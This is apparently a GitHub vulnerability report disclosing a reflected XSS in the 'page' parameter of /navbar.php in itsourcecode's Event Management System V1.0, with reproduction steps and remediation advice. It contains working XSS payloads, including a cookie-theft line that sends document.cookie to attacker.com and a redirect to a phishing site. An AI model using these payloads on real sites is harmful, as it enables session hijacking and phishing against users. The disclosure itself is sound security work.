Skip to content

itsourcecode Event Management System XSS Vulnerability #2

@ltranquility

Description

@ltranquility

itsourcecode Event Management System XSS Vulnerability Report

PRODUCT

Event Management System

VERSION

V1.0

VULNERABILITY TYPE

Cross-Site Scripting (XSS)

Submitter

  • super_luoqing

AFFECTED COMPONENT

/navbar.php

VENDOR URL

https://itsourcecode.com/free-projects/php-project/event-management-system-project-in-php-and-mysql-with-source-code/

VULNERABILITY DETAILS

Reflected XSS via 'page' parameter in /navbar.php

DESCRIPTION

A critical Cross-Site Scripting vulnerability was identified in the Event Management System . The vulnerability exists in the /navbar.php component where user-supplied input through the 'page' URL parameter is directly reflected in the page output without proper sanitization. This allows attackers to inject arbitrary JavaScript code that executes within the context of the victim's browser session. The vulnerability requires no authentication and can be exploited simply by tricking a user into visiting a maliciously crafted URL.

ROOT CAUSE

Unsanitized user input in URL parameter directly reflected in page output

IMPACT

  • Session hijacking
  • Unauthorized actions
  • Data theft
  • Malware distribution

REPRODUCTION STEPS

  1. Visit URL:
    http://192.168.174.128:10013/admin/navbar.php?page=</script><script>alert(0)</script><script>
  2. Observe JavaScript execution
Image

PAYLOAD EXAMPLES

  1. Basic: </script><script>alert(document.domain)</script><script>
  2. Cookie theft: </script><script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script><script>
  3. Redirect: </script><script>window.location='http://phishing.site'</script><script>

REMEDIATION

  1. Input validation:

    • Reject special characters
    • Use allow-list approach
  2. Output encoding:

    • htmlspecialchars()
    • htmlentities()
  3. Security headers:

    • Content-Security-Policy
    • X-XSS-Protection
  4. Regular security testing

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions